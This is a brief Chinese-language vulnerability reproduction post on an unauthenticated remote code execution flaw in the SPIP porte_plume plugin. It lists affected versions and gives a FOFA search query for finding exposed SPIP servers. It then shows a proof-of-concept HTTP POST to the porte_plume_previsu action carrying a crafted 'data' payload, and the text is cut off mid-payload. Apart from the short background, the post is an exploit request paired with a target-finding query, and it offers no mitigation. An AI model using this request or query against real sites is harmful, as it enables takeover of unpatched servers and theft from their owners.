0x01 产品简介
SPIP 的 porte_plume
插件是一款专为SPIP平台设计的插件,主要用于增强文本编辑功能。它通过提供额外的编辑工具和预览功能等方式,帮助用户更高效地完成文本编辑工作。
0x02 漏洞概述
SPIP 4.30-alpha2、4.2.13、4.1.16之前的版本使用的porte_plume插件存在任意代码执行漏洞,远程未经身份验证的攻击者可以通过发送精心设计的HTTP 请求以SPIP用户身份执行任意PHP代码。
0x03 复现环境
FOFA:icon_hash=="-1224668706"
0x04 漏洞复现
PoC
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
data=AA_[<img2>->URL`<?